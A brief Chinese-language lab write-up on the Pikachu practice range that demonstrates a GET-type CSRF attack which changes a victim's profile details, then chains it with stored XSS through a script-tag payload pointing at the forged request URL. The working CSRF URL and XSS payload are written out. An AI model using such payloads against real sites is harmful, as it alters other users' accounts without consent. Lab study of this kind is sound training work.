一、靶场环境
pikaqiu靶场
二、CSRF漏洞/GET型传参
场景要求,
1. 受害者已经在网站上登录了自己的账号
2. 受害者意识薄弱,容易点击未知链接
第一步 受害者lucy登录
第二步 黑客kevin正常登录自己的账号,发现了网站修改个人信息功能
Kevin尝试修改自己的信息,并抓取数据包,构造了一个修改密码功能的url
ip/vul/csrf/csrfget/csrf_get_edit.php?sex=man&phonenum=19999999999&add=newyork&email=9999999%40w.com&submit=submit
lucy点击恶意链接
漏洞复现成功;
三、XSS与CSRF联动
利用GET型CSRF,我们修改payload为
<script src='ip/vul/csrf/csrfget/csrf_get_edit.php?sex=woman&phonenum=18888899999&add=newyork&email=888999990w.com&submit=submit'> </script>
在存储型XSS中输入payload,提交后点击刷新页面,相当于访问这个页面;
返回lucy页面信息,刷新后发现信息已被修改;